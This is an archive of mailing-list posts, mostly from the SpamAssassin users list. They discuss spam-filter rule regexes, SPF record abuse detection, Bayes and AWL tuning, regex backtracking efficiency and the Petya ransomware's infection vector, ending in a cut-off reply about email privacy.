URI_TRY_3LD FP on mynews.apple.com

2021-04-02 Thread Adam Katz
 Hey, John et al. It's been a while. I hope things are going well.

I've found an FP on URI_TRY_3LD from
https://mynews.apple.com/subscriptions?… that you could solve by adding
a new alternation to the relevant negative lookahead in that regex:

-uri URI_TRY_3LD
m,^https?://(?:try|start|get(?!.adobe)|save|check(?!out)|act|compare|join|learn|request|visit(?!or)|my(?!sub|turbotax)w)[^.]*.[^/]+.(?:com|net)b,i
+uri URI_TRY_3LD
m,^https?://(?:try|start|get(?!.adobe)|save|check(?!out)|act|compare|join|learn|request|visit(?!or)|my(?!news.apple.|sub|turbotax)w)[^.]*.[^/]+.(?:com|net)b,i

 However, with its hit freqs [1] show an S/O hovering around 0.100 and
with the GA consistently scoring it so close to your specified 2.000
limit, I doubt this tweak will help enough. I suggest further FP
mitigations and perhaps a lower score limit.

-Adam 

Links:
--
[1]
https://ruleqa.spamassassin.org/20210401-r1888263-n/URI_TRY_3LD/detail


Re: Hints needed for spf rule

2018-10-03 Thread Adam Katz
(Please ignore my last message. My phone hit “send” randomly.)

On Sep 28, 2018, at 9:48 AM EDT, bOnK wrote:
> A better idea might be testing if SPF for a external domain would pass on 
> your own server.
> This is what milter greylist does.
> http://hcpnet.free.fr/milter-greylist/

That’s interesting! We’d definitely need to ensure external relays for such a 
rule in SA, though of course this’d also require some plugin dev work. Does 
anybody have stats on that?

> Though probably exceptional, according to the RFC +all *can be* restrictive...
> https://tools.ietf.org/html/rfc7208#appendix-A.4
> 
>> A.4.  Multiple Requirements Example
>> 
>>Say that your sender policy requires both that the IP address is
>>within a certain range and that the reverse DNS for the IP matches.
>>This can be done several ways, including the following:
>> 
>>example.com.   SPF  ( "v=spf1 "
>>  "-include:ip4._spf.%{d} "
>>  "-include:ptr._spf.%{d} "
>>  "+all" )
>>ip4._spf.example.com.  SPF  "v=spf1 -ip4:192.0.2.0/24 +all"
>>ptr._spf.example.com.  SPF  "v=spf1 -ptr +all"
>> 
>>This example shows how the "-include" mechanism can be useful, how an
>>SPF record that ends in "+all" can be very restrictive, and the use
>>of De Morgan's Law.

This is amazing. And disgusting.

And the only remotely legitimate usage of either the ptr mechanism or 
(separately) inanity like invoking De Morgan’s Law, and therefore also +all.

The ptr mechanism in SPF is officially “do not use” right in the spec 
; PTR records aren’t vetted 
(any network operator can assign literally any rDNS to their IPs), so it 
trivializes forgery that would elicit an SPF pass.

Using De Morgan to intersect ptr with an un-forgeable requirement alleviates 
the issues of ptr but it’s much less complicated to merely bless each one in 
the SPF record.

Any (non-spammer) senders large enough to have issues fitting individual IPs in 
the max size of a record should definitely not delegate control of SPF to rDNS. 
They should instead better allocate their IP space for proper control by CIDR 
or else give up and use an Email Service Provider that actually knows what it’s 
doing 

Re: Hints needed for spf rule

2018-10-03 Thread Adam Katz
On Sep 28, 2018, at 9:48 AM, bOnK wrote:
A better idea might be testing if SPF for a external domain would pass on your 
own server.
> 
> This is what milter greylist does.
> http://hcpnet.free.fr/milter-greylist/
> 
> Though probably exceptional, according to the RFC +all *can be* restrictive...
> https://tools.ietf.org/html/rfc7208
> 
> A.4.  Multiple Requirements Example
> 
>Say that your sender policy requires both that the IP address is
>within a certain range and that the reverse DNS for the IP matches.
>This can be done several ways, including the following:
> 
>example.com.   SPF  ( "v=spf1 "
>  "-include:ip4._spf.%{d} "
>  "-include:ptr._spf.%{d} "
>  "+all" )
>ip4._spf.example.com.  SPF  "v=spf1 -ip4:192.0.2.0/24 +all"
>ptr._spf.example.com.  SPF  "v=spf1 -ptr +all"
> 
>This example shows how the "-include" mechanism can be useful, how an
>SPF record that ends in "+all" can be very restrictive, and the use
>of De Morgan's Law.
> 
> -- 
> b.



Re: Hints needed for spf rule

2018-09-24 Thread Adam Katz
 

On 2018-09-22 10:33 am, Kevin A. McGrail wrote: 

> On 9/22/2018 10:29 AM, Matus UHLAR - fantomas wrote:
> 
>> remove those ?'s: /^v=spf1 .*?all/ and /^v=spf1 .*+all/
> 
> Updated. I was trying to stop a greedy regex if someone was doing a
> weird spf but I am overthinking.

These SPF records are all effectively equivalent (the fourth is Sender
ID [1], we'll get to #5 later): 

v=spf1 +all
v=spf1 all
v=spf1 all 192.0.2.0/24
v=spf2.0/mfrom +all
v=spf1 1.2.3.0/1 128.4.5.0/2 192.6.7.8/3 -all

So therefore I propose regexps like /^v=spf[12].*[s+]allb/ and
/^v=spf[12].*s?allb/ (the latter should be very rare and a better
indication of a clueless admin than a spammer).

The fifth item above permits 0.0.0.0 to 223.255.255.255 and therefore
only multicast and the reserved Class E network are banned. To address
this, consider /^v=spf[12].*[0-9]/[0-7]b/. I haven't observed this sort
of workaround (yet), but it's the attackers' logical escalation in
response to this. (I conservatively chose a max mask of /7, though I
don't think there's any legitimate use of /8, even by the remaining
Class A holders [2] like AT, HP, and the US DoD--nobody _should_ have
an email network even approaching a /16 let alone a /8, though note that
Google currently includes three /16s. I'm not sure where to draw a
similar "too large" threshold for IPv6; perhaps /32?)

-Adam (still here, sometimes) 

Links:
--
[1] https://en.wikipedia.org/wiki/Sender_ID
[2]
https://en.wikipedia.org/wiki/List_of_assigned_/8_IPv4_address_blocks#List_of_assigned_/8_blocks

Re: About Petya2 campaign

2017-06-28 Thread Adam Katz
My team has seen no evidence that Petya/NotPetya/Nyetya has an email
vector.  Everything we've found on this front has been a different
attack.  The true source of this attack is currently believed to be from
fraudulent and unsigned tax software updates:

From
http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
> The identification of the initial vector has proven more challenging.
> Early reports of an email vector can not be confirmed. Based on
> observed in-the-wild behaviors, the lack of a known, viable external
> spreading mechanism and other research we believe it is possible that
> some infections may be associated with software update systems for a
> Ukrainian tax accounting package called MeDoc. Talos continues to
> research the initial vector of this malware.

This happened with WannaCry too.  The emails we saw reported as WannaCry
ended up being Jaff
<http://blog.talosintelligence.com/2017/05/wannacry.html?showComment=1494683710652#c7954588230675341778>.

If you have email samples suggesting otherwise, I'd very much like to
see them.

Adam Katz
@adamhotep <https://twitter.com/adamhotep>


On 06/27/2017 11:09 AM, Alex wrote:
> Hi,
> On Tue, Jun 27, 2017 at 1:51 PM, Pedro David Marco
> <pedrod_ma...@yahoo.com> wrote:
>> Hi everybody...
>> just bothering you to share this:
>> We are detecting  Petya2 inside attached PDFs...  (not detected by many AV)
>> has anyone seen it into any MS OFFICE attachment?  or maybe any .js dropper?
> How are you detecting them? Tips for blocking, if the AVs aren't
> catching them yet? Have you submitted to sanesecurity?




signature.asc
Description: OpenPGP digital signature


Re: Add "may be forged" minor rule?

2015-09-30 Thread Adam Katz
On 09/28/2015 02:55 PM, RW wrote:
> On Mon, 28 Sep 2015 14:27:33 -0700 (PDT) John Hardin wrote:
>>> # Add spamminess to "may be forged" warning in Received header
>>> header RCVD_MAY_BE_FORGED   Received =~ /\(may be forged\)/
>>> describe RCVD_MAY_BE_FORGED Fake HELO info in Received header
>>> score RCVD_MAY_BE_FORGED0.2
>> RE looks fine. I'd just describe it as "forgery warning in Received 
>> header" rather than trying to interpret *why* the warning is there.

This has existed (in sandbox form, with stats) for quite a while:

header __MAY_BE_FORGED  Received =~ /\(may be forged\)/
meta MAY_BE_FORGED  __MAY_BE_FORGED && !__NOT_SPOOFED && !__VIA_ML
describe MAY_BE_FORGED  Relay IP's reverse DNS does not resolve to IP

   MSECSSPAM% HAM% S/ORANK   SCORE  NAME
   0   1.3921   0.1703   0.8910.650.01  T_MAY_BE_FORGED
   0   1.4303   0.2045   0.8750.64   (n/a)  __MAY_BE_FORGED


So this isn't the strongest of spam indicators, at least in the general
case.

> YMMV but I find that in deep received headers "may be forged" is a
> slight ham indicator. That's why I suggested limiting the match to the
> MX server's received header. 

It's a spam indicator on *some* /properly implemented/ mail
infrastructures.  You need to test it on your own infrastructure to
ensure that sendmail and rDNS are playing nice together.  If your
infrastructure /doesn't/ add this header (this is a sendmail thing
iirc), you do not want this type of rule.  Even if it does, you have the
issue of external mail servers adding this header.  That's why the above
meta rule excludes mailing lists.

-Adam

-- 
Adam Katz
@adamhotep <https://twitter.com/adamhotep>


signature.asc
Description: OpenPGP digital signature


SARE RULEGEN, Re: Rule updates....

2015-01-08 Thread Adam Katz
Ran these against my corpus.  Here are the worst performers (lots in
common with RW's complaints):

*SPAM%   HAM%S/O  NAME*
0.013  0.153  0.080  __RULEGEN_PHISH_BLR6YY
0.006  0.286  0.022  __RULEGEN_PHISH_0ATBRI
0.008  0.334  0.023  __RULEGEN_PHISH_L3I0Z5
0.002  0.300  0.006  __RULEGEN_PHISH_LGYG7Q
0.017  1.387  0.012  __RULEGEN_PHISH_QVS6GE
0.045  2.490  0.018  __RULEGEN_PHISH_UNQ4VP
0.027  2.011  0.013  __RULEGEN_PHISH_B9HL3A

body __RULEGEN_PHISH_UNQ4VP  / may contain information that is /
body __RULEGEN_PHISH_QVS6GE  / or entity to which it is addressed/
body __RULEGEN_PHISH_B9HL3A  /The information contained in this /
body __RULEGEN_PHISH_0ATBRI  / it is addressed\. If you are n/
body __RULEGEN_PHISH_LGYG7Q  / you have received it in error. /
body __RULEGEN_PHISH_BLR6YY  /uthorised and regulated by the /
body __RULEGEN_PHISH_L3I0Z5  / is intended solely for the ..d/

A large number of the FPs come from Paypal and similar services.

Even controlling for those, I haven't found the phishing ruleset useful
at all.  The fraud rules do have limited utility.

What relationship does this have to the 10+ year-old SARE stuff?


On 12/20/2014 03:35 AM, Axb wrote:
 On 12/18/2014 06:27 PM, RW wrote:
 On Tue, 16 Dec 2014 13:10:05 +0100
 Axb wrote:

 https://sourceforge.net/projects/sare/files/

 replaces any older version.

 leech while it lasts

 adjust scores if needed..


 There are some rules that shouldn't be there. (I only tested a few that
 looked the most dubious)

 The first is a common phrase in mail from UK banks and other financial
 services companies. Note the ise spelling which is common outside
 the US.

 body __RULEGEN_PHISH_BLR6YY  /uthorised and regulated by the /


 The following are common in legal disclaimer signatures:

 body __RULEGEN_PHISH_UNQ4VP  / may contain information that is /
 body __RULEGEN_PHISH_B9HL3A  /The information contained in this /
 body __RULEGEN_PHISH_C6URDE  / do not necessarily represent those of /
 body __RULEGEN_PHISH_L3I0Z5  / is intended solely for the ..d/


 This hits some of of my ham:

 body __RULEGEN_PHISH_SRX3XZ  / apologize for any inconvenience/


 Unless there's a bug, the fact that those disclaimer phrases got through
 suggests that these rules are either intended to be very much more
 aggressive than the SOUGHT rules,  or the ham corpus isn't good enough.


 as the rules were generated with donated corpus data, you're more than
 welcome to send me an archive of ham samples to avoid these potential
 issues.








signature.asc
Description: OpenPGP digital signature


Re: Emails with extremely long URLs

2014-11-23 Thread Adam Katz
On 11/22/2014 07:16 PM PST, John Hardin wrote:
 On Sat, 22 Nov 2014, Igor Chudov wrote:
 I receive spam emails that contain extremely long URLs, about 2,400
 characters. I wanted to know if spamassassin has a rule that I can
 turn on to flag such URLs. I do not think that I ever receive
 legitimate emails with URLs that long.

 I don't think there's anything in the base rules but that should be
 pretty simple:

uri   URI_ABSURDLY_LONG  /.{2000}/

There was a similar request on Stack Overflow
https://stackoverflow.com/questions/26478828/spamassassin-regex-to-catch-long-url
recently.  It had the extra requirement of satisfying TLDs that SA uri
rules cannot yet extract from bodies, but the stats I gave are actually
based on uri rules.

An excerpt from my answer on 2014/11/13:
 That will technically work, though I'm sure you'll find it fires on a
 LOT of non-spam, marketing mail in particular [...]

 No size range is going to have a terribly good spam:ham ratio (an S/O
 https://wiki.apache.org/spamassassin/HitFrequencies#The_S.2FO_Ratio,
 aka precision https://en.wikipedia.org/wiki/Precision_and_recall, of
 0.900 is possibly acceptable, but you really want to be closer to
 1.000). By my tests, the best range is 192-256 characters, but even
 that is too weak (S/O of 0.862 in my data) to be terribly useful.
 There is almost no spam using a link with over 1024 characters (S/O of
 0.057 for me).

That S/O is still true (it's S/O is now 0.054 and its spam hit rate
remains below 0.01%).  At 2000+ chars, the S/O is still quite low, as
are the independent volumes of spam and ham.  Volume of all mail
containing 1024+ character URLs has increased slightly in the past few
months, from roughly 0.10% to 0.15%.  This increase has been slightly
more among ham than spam.



signature.asc
Description: OpenPGP digital signature


Re: Philosophical question on Bayes (was Re: 23_bayes_ignore_header.cf)

2014-10-14 Thread Adam Katz
 On Tue, 14 Oct 2014 16:10:52 +0200 Axb axb.li...@gmail.com wrote:
 and to avoid further discussions of what header may pollute bayes or
 not, I've removed all header entries which are not directly related
 to AV/filter products.

On 10/14/2014 07:17 AM, David F. Skoll wrote:
 I'm not sure I agree with being too clever about Bayes.  Surely by its
 very nature, the Bayes algorithm will itself indicate which tokens
 are relevant and which are not?  Isn't that the whole point of Bayes?

 I think being to clever about massaging the data that gets fed to
 Bayes may be counter-productive.  For sure, *some* massaging is in order;
 a token should be a semantic unit, so something like www.example.com
 should probably be one token rather than three, but beyond that I wonder
 if it's good or not to massage the data?

The purpose of bayes_ignore_header is twofold:

 1. Prevent inheriting other systems' false positives (ensure better
independence)
 2. Prevent relying upon headers that won't exist at delivery time (e.g.
added by the mailbox server)

This is why it's so important to ignore other spam engines, which
basically fit into both of those categories.




signature.asc
Description: OpenPGP digital signature


Re: Help with body rule

2014-05-28 Thread Adam Katz
On 05/28/2014 11:16 AM, Alex wrote (syntax highlighting added):
 I'm trying to write a body rule that will catch an email exactly
 containing any number of characters up to 15, followed by a URI,
 followed by any number of characters, up to 15. My attempt has failed
 miserably, and hoped someone could help.
 body  LOC_SHORT_BODY_URI  m{^.{0,15}(https?://.{1,50}).{0,15}$}

 This catches pretty much everything and I can't figure out why.

This should catch pretty much any mail with a web link in it.  Body
rules don't reliably match start and end of line markers (^ and $), so
you can't use them reliably.  You also have no delimiter between the URL
and the following text.  For example:

body  LOC_SHORT_BODY_URI  m{\A.{0,15}(?:https?://\S{1,50})(?!\S).{0,15}\Z}ms


This also improves your efficiency by using a non-capturing group and
(far more importantly) removing the ambiguity between your two ranges
(so there's no need to try every conceivable iteration).  I used a
negative look-ahead in order to satisfy a lack of trailing text (rather
than using \s).  I also used \A and \Z with /ms in order to better
describe a short email, but again *this may not work reliably due to how
the body is parsed*.  This would work slightly better with rawbody, but
it still won't be perfect.


signature.asc
Description: OpenPGP digital signature


Re: khop channel errors

2014-02-17 Thread Adam Katz
On 02/01/2014 09:04 PM, Glenn Sieb wrote:
 Actually, now that I look at it, it appears to be a DNS issue. Hopefully
 it will get fixed soon.
 I noticed this a while ago, my guess is that the channel's gone.

 Are there any other channels out there at this point? What are people
 using nowadays?

I intend to return those channels eventually.  My server has been down
for several months.  I'm hoping to be back online in the spring.


signature.asc
Description: OpenPGP digital signature


Re: Spam Pattern

2014-02-14 Thread Adam Katz
On 02/12/2014 01:46 PM, John Hardin wrote:
 On Wed, 12 Feb 2014, Axb wrote:
 On 02/12/2014 10:06 PM, John Hardin wrote:
  Perhaps something like this:

  body  __HEXHASHWORD   /\b[0-9a-f]{30,}\s[a-z]{1,10}\b/
  tflags__HEXHASHWORD   multiple maxhits=5
  meta  HEXHASH_WORD__HEXHASHWORD  4
  describe  HEXHASH_WORDHexadecimal hash followed by a word

  Added to my sandbox, just in case.

 John,

 Isn't {30,} (without a limit) dangerously expensive?

 Potentially expensive; the character class and the fact that the
 following atom is not in that class limits the risk - backtracking
 isn't a possibility. However, point taken - recommend {30,64} instead.

Given the nature of the content, I'd go the other direction and not
require the word boundary.  This removes the wildcard, though it doesn't
short circuit as quickly, so one could debate which version is more
efficient.

body  __HEXHASHWORD   /\b[a-z]{1,10}\s[0-9a-f]{30}/
tflags__HEXHASHWORD   multiple maxhits=5
meta  HEXHASH_WORD__HEXHASHWORD  4
describe  HEXHASH_WORDFive hexadecimal hashes, each following a word

I'm curious if the hex string is always so similar; it may be enough to
use  \bb8b177bf24975  and not need the tflags multiple piece.



signature.asc
Description: OpenPGP digital signature


Re: Spam Pattern

2014-02-14 Thread Adam Katz
Ha!  I checked my mail before sending this; we're on the same wavelength
yet our emails are out of sync.  You just suggested the same thing I was
leaning on.

On 02/14/2014 10:53 AM, John Hardin wrote:
 S/O is a little surprising:

 http://ruleqa.spamassassin.org/?daterev=20140213-r1567864-nrule=%2FHEXHASH


 I'm curious as to what hits that in ham...

 Perhaps more repetitions would improve that?

I'm actually thinking of replacing the leading \b with a \s to avoid
matching paths and extensions and maybe requiring two preceding words to
avoid a list of file/md5 pairings.  We can experiment with different hit
thresholds as well.

body  __HEXHASHWORD   /(?:\s[a-z]{1,10}){2}\s[0-9a-f]{30}/
tflags__HEXHASHWORD   multiple maxhits=8
meta  HEXHASH_WORD_5  __HEXHASHWORD = 5
describe  HEXHASH_WORD_5  5 hexadecimal hashes, each following two words
meta  HEXHASH_WORD_6  __HEXHASHWORD = 6
describe  HEXHASH_WORD_6  6 hexadecimal hashes, each following two words
meta  HEXHASH_WORD_7  __HEXHASHWORD = 7
describe  HEXHASH_WORD_7  7 hexadecimal hashes, each following two words
meta  HEXHASH_WORD_8  __HEXHASHWORD = 8
describe  HEXHASH_WORD_8  8 hexadecimal hashes, each following two words


Users:  Do /not/ implement all of these at once.  This is for Rule QA
testing only.  Once we have results, we can figure out which threshold
is best and then come up with a suggestion or published rule.  (Maybe
tflags nopublish is wise here.)


signature.asc
Description: OpenPGP digital signature


Re: Spam Pattern

2014-02-14 Thread Adam Katz
On 02/14/2014 11:23 AM, Amir Caspi wrote:
 To be clear, that wasn't my sample; I am not the originator of this
 thread.

Whoops, my bad.  My point was clear anyway.

 What about this, a variant of what I posted earlier?  It requires 10
 matches, but I believe it does the same thing as yours except it does
 not limit the word size between hashes, and allows for whitespace:

 rawbody AC_REPEATED_HASHCODE/(\s[a-f0-9]{25,}\s)(?:(?:\s*\w+)+\1){10}

 Yours also limits the amount of characters between repeated hashes to
 99, but this might well not be the case.

Noo, don't do that.  (?:\s*\w+)+  is a *ReDoS
https://en.wikipedia.org/wiki/ReDoS**bomb* (and you have it ten
times!) which will destroy your efficiency.  Think about how it would
match the string aa (or ANY word, for that matter).  Here are its
trials, matching each of the nested parentheses to illustrate the logic:

 1. (aa)
 2. (a)(a)
 3. ()(aa)
 4. ()(a)(a)
 5. (aaa)(aaa)
 6. (aaa)(aa)(a)
 7. (aaa)(a)(a)(a)
 8. (aa)()
 9. (aa)(aaa)(a)
10. (aa)(aa)(aa)
11. (aa)(a)(aaa)
12. (aa)(a)(aa)(a)
13. (aa)(a)(a)(aa)
14. (aa)(a)(a)(a)(a)
15. (a)(a)
16. (a)()(a)
17. (a)(aaa)(aa)
18. (a)(aaa)(a)(a)
19. (a)(aa)(aaa)
20. (a)(aa)(aa)(a)
21. (a)(aa)(a)(a)(a)
22. (a)(a)()
23. (a)(a)(aaa)(a)
24. (a)(a)(aa)(aa)
25. (a)(a)(aa)(a)(a)
26. (a)(a)(a)(aaa)
27. (a)(a)(a)(aa)(a)
28. (a)(a)(a)(a)(aa)
29. (a)(a)(a)(a)(a)(a)
30. (no match)

You want to fail faster than that!

I call these ReDoS bombs though Wikipedia uses the term evil.  Given
how they're rarely intended, I don't like that term.  An actual evil
ReDoS, snuck in and uncaught, would be exploited in a ReDoS attack. 
(A ReDoS attack could also exploit an unintended bomb.)


signature.asc
Description: OpenPGP digital signature


Re: AXB_X_ORIG_OMNIMS is causing too many FPs

2013-10-29 Thread Adam Katz
On 10/28/2013 12:30 PM, John Hardin wrote:
 On Mon, 28 Oct 2013, Axb wrote:
 I'll disable this rule.

 Convert it to a subrule, it may be useful in metas.

It is useful.  I added the domain to freemail_domains (see r1533678
https://svn.apache.org/viewvc?view=revisionrevision=1533678) to catch
an old spam signature
http://ruleqa.spamassassin.org/?rule=FREEMAIL_REPLYTO that the ISC
noted
https://isc.sans.edu/diary/New+spamming+technique+-+onmicrosoft.com/16841
it is exhibiting.  I don't think our list had been updated for a while,
either; I found one site
http://www.zemskov.net/free-email-domains.html that lists hundreds of
domains we were missing.  Either it was especially comprehensive or
we're missing lots more.

This should do it:

header __ONMICROSOFT_REPLYTOReply-To =~ /\@\w{5,30}\.onmicrosoft\.com\b/i
meta KHOP_ONMS_REPLYTO_FREEMAIL AXB_X_ORIG_OMNIMS  !__ONMICROSOFT_REPLYTO  
__freemail_replyto



signature.asc
Description: OpenPGP digital signature


Re: FSL_HELO_BARE_IP_2 RCVD_NUMERIC_HELO

2013-10-14 Thread Adam Katz
On 10/12/2013 09:26 AM, Stan Hoeppner wrote:
 These two rules are adding 4.0 pts [...]
 Content analysis details:   (4.8 points, 4.2 required)
  pts rule name  description
  -
  2.8 FSL_HELO_BARE_IP_2 FSL_HELO_BARE_IP_2
  1.2 RCVD_NUMERIC_HELO  Received: contains an IP address used for HELO
  0.8 BAYES_50   BODY: Bayes spam probability is 40 to 60%
 [score: 0.5314]

The others have addressed the two rules you mentioned, so I'll leave
that alone in this email.

There's more here than that:  If you're using Bayes, you have to train
it.  Right now, it's hurting you:  Those 0.8 points should be some
negative value, perhaps -1.9 or -0.5 (the default scores for BAYES_00
and BAYES_05), which would then have made that message score 2.1 or 3.5,
both of which are below your 4.2 threshold (which is already too low!).

On that threshold:  there are better ways to nail more spam than
lowering the threshold.  SpamAssassin is highly tuned for 5.0 and while
it's safe to bump that threshold up (more conservative, e.g. I block at
8.0 and flag at 5.0), it is not as safe to pull it down.

Better way #1: plugins.  Razor2, Pyzor, DCC.  Decently drop-in (though
DCC isn't as easy as it once was).

Better way #2: Bayes.  Set it up to facilitate better training.  Create
learn-spam and learn-nonspam folders for each user and run cron jobs
that run sa-learn (or better, spamassassin -r so you can learn and
report them) and then empty the folders.  Once you can trust Bayes, you
can increase the magnitude of its scores.  Do this slowly and carefully.

Better way #3: AWL.  This is now disabled by default, in part due to
misunderstandings (it is horribly named; it's as much a black list as it
is a white list, and it's not as persistent as its storage model
purports).  This nudges a sender's mail towards its previous average
score.  Set it up site-wide, /not/ per-user, and start it with a low
factor (say 0.1) until you can trust it, slowly increasing it up to 0.5
(you can go higher, but I wouldn't go too much higher; I use 0.333). 
Keep in mind that AWL doesn't clean up after itself the way Bayes does,
so the DB will grow over time.  There are limited guides online for how
to prune it.

 Received: from bendel.debian.org (bendel.debian.org [82.195.75.100])
   by greer.hardwarefreak.com (Postfix) with ESMTP id C95BD6C0CE
   for s...@hardwarefreak.com; Sat, 12 Oct 2013 10:23:37 -0500 (CDT)
 [...]
 X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on bendel.debian.org
 X-Spam-Level:
 X-Spam-Status: No, score=-9.6 required=4.0 tests=FOURLA,FREEMAIL_FROM,
   LDOSUBSCRIBER,LDO_WHITELIST,RCVD_NUMERIC_HELO,T_RP_MATCHES_RCVD,
   T_TO_NO_BRKTS_FREEMAIL autolearn=unavailable version=3.3.2
 [...]
 X-Amavis-Spam-Status: No, score=-5.735 tagged_above=-1 required=5.3
   tests=[BAYES_00=-2, FOURLA=0.1, FREEMAIL_FROM=0.001, LDO_WHITELIST=-5,
   RCVD_IN_DNSWL_NONE=-0.0001, RCVD_NUMERIC_HELO=1.164,
   T_RP_MATCHES_RCVD=-0.01, T_TO_NO_BRKTS_FREEMAIL=0.01] autolearn=ham

Another option is to trust Debian's SA instance.  You can add
82.195.75.100 to trusted_networks in your local.cf.  Be careful, this
would mean inheriting some of Debian's false negatives.


signature.asc
Description: OpenPGP digital signature


Re: FSL_HELO_BARE_IP_2 RCVD_NUMERIC_HELO

2013-10-14 Thread Adam Katz
On Sat, 12 Oct 2013, Stan Hoeppner wrote:
 and engage in discussion WRT lowering the score, eliminating the
 overlap with the other bare IP HELO rules, etc?

On 10/12/2013 07:28 PM, John Hardin wrote:
 It seems that 94% of the ham hits in masscheck are against list mail,
 and none of the spam hits are, so it would seem reasonable to add an
 exclusion for list messages.

 Maddoc hasn't touched these rules since 2009, so I will go ahead and
 add an exclusion for that.

Actually, the overlap issue is quite real.  These two rules
http://ruleqa.spamassassin.org/?daterev=20131014-r1531815-nrule=FSL_HELO_BARE_IP_2+RCVD_NUMERIC_HELOsrcpath=g=Change
are quite similar:

MSECS   SPAM%   HAM%S/O RANKSCORE   NAME
0   60.7267 0.3533  0.994   0.852.00FSL_HELO_BARE_IP_2
http://ruleqa.spamassassin.org/20131014-r1531815-n/FSL_HELO_BARE_IP_2/detail

0   56.8567 0.0784  0.999   0.970.00RCVD_NUMERIC_HELO
http://ruleqa.spamassassin.org/20131014-r1531815-n/RCVD_NUMERIC_HELO/detail


overlap spam: 99% of RCVD_NUMERIC_HELO
http://ruleqa.spamassassin.org/20131014-r1531815-n/RCVD_NUMERIC_HELO/detail
hits also hit FSL_HELO_BARE_IP_2
http://ruleqa.spamassassin.org/20131014-r1531815-n/FSL_HELO_BARE_IP_2/detail;
93% of FSL_HELO_BARE_IP_2
http://ruleqa.spamassassin.org/20131014-r1531815-n/FSL_HELO_BARE_IP_2/detail
hits also hit RCVD_NUMERIC_HELO
http://ruleqa.spamassassin.org/20131014-r1531815-n/RCVD_NUMERIC_HELO/detail
(ham 100%)
overlap spam: 93% of FSL_HELO_BARE_IP_2
http://ruleqa.spamassassin.org/20131014-r1531815-n/FSL_HELO_BARE_IP_2/detail
hits also hit RCVD_NUMERIC_HELO
http://ruleqa.spamassassin.org/20131014-r1531815-n/RCVD_NUMERIC_HELO/detail;
99% of RCVD_NUMERIC_HELO
http://ruleqa.spamassassin.org/20131014-r1531815-n/RCVD_NUMERIC_HELO/detail
hits also hit FSL_HELO_BARE_IP_2
http://ruleqa.spamassassin.org/20131014-r1531815-n/FSL_HELO_BARE_IP_2/detail
(ham 22%)

That's a lot of overlap.  FSL_HELO_BARE_IP_2 may be well served by
excluding RCVD_NUMERIC_HELO.  Given its higher S/O, that might even get
the latter rule a score again (I assume the zero score came from John's
exclusion and a preference towards FSL_HELO_BARE_IP_2).



signature.asc
Description: OpenPGP digital signature


Re: Question about T_KHOP_FOREIGN_CLICK

2013-06-05 Thread Adam Katz
On 05/31/2013 06:51 AM, Bowie Bailey wrote:

 On 5/31/2013 8:30 AM, Matteo Vannucchi - TeamEnterprise wrote:
 Hello, my name is Matteo.

 I do not manage a spamassassin installation, but I would like to ask
 this simple question, because I saw it is a rule which is used to
 evaluate spam score.
 I tried searching Google, the users forum, the Wiki and the Docs page
 in the site, but did not find any information. The simple question
 is: how does T_KHOP_FOREIGN_CLICK rule work?

 Hope the answer is as simple.

 It's a fairly complex regex rule.  Without spending too much time
 analyzing it, I think it is looking for a link that says click here
 in a language other than english.

You are correct, though it also matches English.  I've placed a
syntactical explanation of this regex at http://regex101.com/r/qS8nF4

 A related question is why is this rule name duplicated?  My guess is
 that it was changed at some point from a rawbody rule to a uri_detail
 rule and the old one was left in there.  One of them should be removed
 to avoid confusion.

 from 72_active.cf:

 rawbodyT_KHOP_FOREIGN_CLICK
 m{\bhref=[^]{9,199}[^]{0,80}(?:(?!/a\b)[^]{0,299}[^]{0,80}){0,9}[^]{0,80}\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a
 ]|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)}si

 uri_detail T_KHOP_FOREIGN_CLICK text =~
 /\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a
 ]|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)/i

The sandbox promotion system does make this a bit more confusing than it
should be (using a double negative), but it is assembling the two
versions of the rule correctly:

##{ T_KHOP_FOREIGN_CLICK if ! plugin (Mail::SpamAssassin::Plugin::URIDetail)

if ! plugin (Mail::SpamAssassin::Plugin::URIDetail)
  rawbodyT_KHOP_FOREIGN_CLICK   
m{\bhref=[^]{9,199}[^]{0,80}(?:(?!/a\b)[^]{0,299}[^]{0,80}){0,9}[^]{0,80}\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a
 ]|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)}si
endif
##} T_KHOP_FOREIGN_CLICK if ! plugin (Mail::SpamAssassin::Plugin::URIDetail)

##{ if !(! plugin (Mail::SpamAssassin::Plugin::URIDetail))_sandbox

if !(! plugin (Mail::SpamAssassin::Plugin::URIDetail))
  uri_detail T_KHOP_FOREIGN_CLICK   text =~ 
/\b(?:cli(?:quez\W|ck\Wa)ici\b|cli(?:cca\W|c\Wa|que\Wa)qu[^.,a 
]|klie?k(?:\Whi?er|ni(?:j|nite)\Wtu[tk]aj)\b)/i
endif
##} if !(! plugin (Mail::SpamAssassin::Plugin::URIDetail))_sandbox

This means that the rawbody version is used if URIDetail isn't loaded
and the uri_detail version is used if the URIDetail plugin is loaded.


signature.asc
Description: OpenPGP digital signature


[OT] Re: Privacy Concerns and Implementing Corrective Proceedures To Combat Information Harvesting

2012-09-18 Thread Adam Katz
This topic is off topic.  I have marked the subject as such.

On 09/05/2012 09:40 PM, NMTUser X ...@gmail.com wrote:
 Would it be possible to send mail to myself encrypted in pgp/gpg,
 use a token at the beginning of the email with the correct email
 address (which is on the local network) have procmail or spamassassin
 parse all incoming messages, strip the headers, decrypt the message,
 and reinsert it into the mail spool to be forwarded to the correct 
 person? If so where do I begin to look?  Could (gpgzip) attachments 
 be preserved?
 
 This would allow me to continue to use gpg I could ditch google and 
 use ANY mail forwarding agent - even hushmail - and I could keep my 
 professional life intact.

Okay, full stop before I tell you how to do this.

WTF are you doing using google if you're this paranoid?  Not only are
they an advertiser giving you a service so they can farm your data for
profit, but they're also stats gurus who are insanely good at exactly
that!  Continuing to use them but sending all mail to a remailer will
still grant them full access to your mail folders, so they still get all
that data anyway.

You appear to be trying to hack your way into privacy with Google.
Knock it off, there's no way you can make it work.  (The only thing I
can think of would essentially be serving everything yourself and using
some kind of hack of their IMAP system for free cloud storage.  This is
